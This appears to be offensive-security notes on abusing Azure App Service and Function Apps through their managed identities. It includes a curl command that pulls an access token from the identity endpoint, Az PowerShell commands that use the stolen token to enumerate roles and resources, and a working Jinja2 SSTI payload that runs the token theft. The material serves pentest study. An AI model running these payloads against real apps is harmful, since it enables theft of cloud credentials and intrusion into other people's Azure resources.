# Azure App Service Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

### Isolation {% hint style="info" %} Each app runs inside a sandbox but isolation depends upon App Service plans {% endhint %} * Apps in Free and Shares tiers run on shared VMs * Apps in standard and premium tiers run on dedicated VMs ### App Service Abuse While there are default security features available with App Service (sandboxing/isolation), vulnerabilities in the code deployed are abusable. The classic web app vulns like SQL injection, OS command injection, etc do not disappear. ### Managed Identity By abusing and vulnerability in an app service and it is possible to get command execution, the privileges will be of the low-privilege worker process. But if the app service uses a Managed Identity, we may have the ability to have interesting permissions on other Azure resources.

Once you have command execution, run `env`to check if the `identity_header`variable and `identity_endpoint`are set. If they are, the app has a managed identity

Now, to get a access\_token for the app service, we can use the following command: {% code lineNumbers="true" %} ```php curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER ``` {% endcode %}

### Check App Privileges Once you have a access\_token for the app service, use that to connect to Az Cli: ```powershell Connect-AzAccount -AccessToken $token -AccountID 064aaf57-30af-41f0-840a-xxxxx ``` Now to check which Role Assignments our token has run: ```powershell Get-AzRoleAssignment ``` To get the available resources run: ```powershell Get-AzResource ``` ### SSTI payload Found a app vulnerable to SSTI (Jinja2), use this payload to get the app's access\_token: ```python {{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }} ``` ### Function App A function app (also called Azure Functions), is Azure's 'serverless' solution to run code. A function app is supposed to be used to react to an event like: * HTTP Trigger * Processing a File upload * Run code on a scheduled time and more Function apps also support managed identities! {% hint style="info" %} It looks a lot like AWS Lambda {% endhint %} When you get the following error , it means the access\_token has to access to any resources:

{% hint style="warning" %} By default, managed identities (service principals), have no read access at all! {% endhint %} In this case, something like AzureHound comes in handy